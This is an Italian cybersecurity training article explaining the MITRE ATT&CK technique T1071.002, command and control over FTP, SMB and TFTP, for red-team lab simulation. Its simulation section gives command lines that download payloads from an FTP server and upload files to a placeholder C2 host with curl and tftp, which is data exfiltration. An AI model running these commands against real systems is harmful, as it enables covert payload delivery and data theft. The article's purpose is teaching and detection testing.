Iscriviti al webinar gratuito del 12 Maggio per diventare Forensic Analyst! Scopri di più
Corso Ethical Hacker: accedi alla promozione fino al 30 Aprile! Scopri di più
FTP, FTPS, SMB e TFTP sono protocolli che qualunque rete aziendale utilizza quotidianamente per lo spostamento di file tra server, workstation e dispositivi di rete. Proprio questa ubiquità li rende un canale ideale per il Command and Control (TA0011): un avversario che incapsula comandi e risposte dentro sessioni FTP o named pipe SMB si mimetizza nel traffico legittimo, rendendo la detection una sfida concreta.
La tecnica T1071.002 sfrutta il livello applicativo di questi protocolli. I pacchetti FTP e SMB presentano numerosi campi e header in cui occultare dati; persino i file trasferiti possono diventare contenitore per istruzioni o esfiltrazione. L'attaccante non ha bisogno di protocolli esotici: basta un server FTP controllato dall'esterno o una share SMB interna per mantenere un canale C2 stabile, difficile da distinguere dal traffico ordinario.
I numeri del framework lo confermano: 4 gruppi APT, 19 software (tra malware e tool offensivi), 2 campagne documentate e 2 mitigazioni ruotano attorno a questa sotto-tecnica. Gruppi come APT41 e Kimsuky la utilizzano per il download di payload, mentre framework come Cobalt Strike e Mythic la implementano nativamente per la comunicazione peer-to-peer su SMB. Il risultato è uno scenario in cui il confine tra traffico di trasferimento file legittimo e canale di comando avversario diventa sottilissimo, e richiede un approccio di detection multi-layer.
Il modo più diretto per simulare un canale C2 via protocolli di trasferimento file è partire da SMB, perché quasi ogni ambiente Windows lo ha attivo e le named pipe offrono un canale peer-to-peer naturale. In un laboratorio red team, Cobalt Strike (a pagamento) resta il riferimento: il listener SMB si configura creando un profilo che incapsula la comunicazione nelle named pipe standard. Una volta generato il beacon, il canale C2 transita su porta 445 senza generare connessioni verso l'esterno — tutto il traffico resta interno, delegato a un beacon "parent" con uscita HTTP o DNS.
Per chi preferisce un'alternativa open source, Mythic (open source) supporta profili C2 SMB-based. L'architettura modulare permette di selezionare l'agent (ad esempio il payload Athena o Apollo) e associare il profilo SMB come canale di trasporto. In fase di setup nel laboratorio, si configura il profilo C2 direttamente dall'interfaccia web di Mythic, specificando il nome della named pipe da utilizzare.
Havoc (open source) offre un'altra opzione concreta: il suo listener SMB permette la comunicazione laterale tra implant senza traffico Internet diretto, simulando lo stesso pattern operativo che il framework documenta per la comunicazione C2.
Sul fronte FTP, la simulazione è ancora più semplice. Si può allestire un server FTP controllato con vsftpd (open source) o pyftpdlib (open source) su una macchina d'attacco e poi forzare il target a eseguire un download da quel server. Una sequenza basilare da shell compromessa:
ftp -n -s:script.txt <indirizzo-server-C2>
Dove script.txt contiene le credenziali e i comandi GET per scaricare payload. Questo replica il pattern usato da APT41, che ha impiegato payload con download via FTP, e quello di PUBLOAD, che sfrutta curl per esfiltrare dati su FTP:
curl -T C:\dati\archivio.rar ftp://utente:password@<indirizzo-server-C2>/upload/
Per TFTP, tipicamente usato in ambienti con dispositivi di rete, il comando nativo Windows funziona senza installazioni aggiuntive:
tftp -i <indirizzo-server-C2> PUT C:\Windows\Temp\exfil.bin
Infine, per validare che il traffico generato sia realmente indistinguibile da quello legittimo, si consiglia di catturare il pcap con Wireshark (open source) e confrontare le sessioni simulate con quelle di baseline. Questo è il vero valore aggiunto dell'esercizio: non solo verificare che il canale funzioni, ma dimostrare al blue team quanto sia difficile distinguerlo dal rumore di fondo.
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo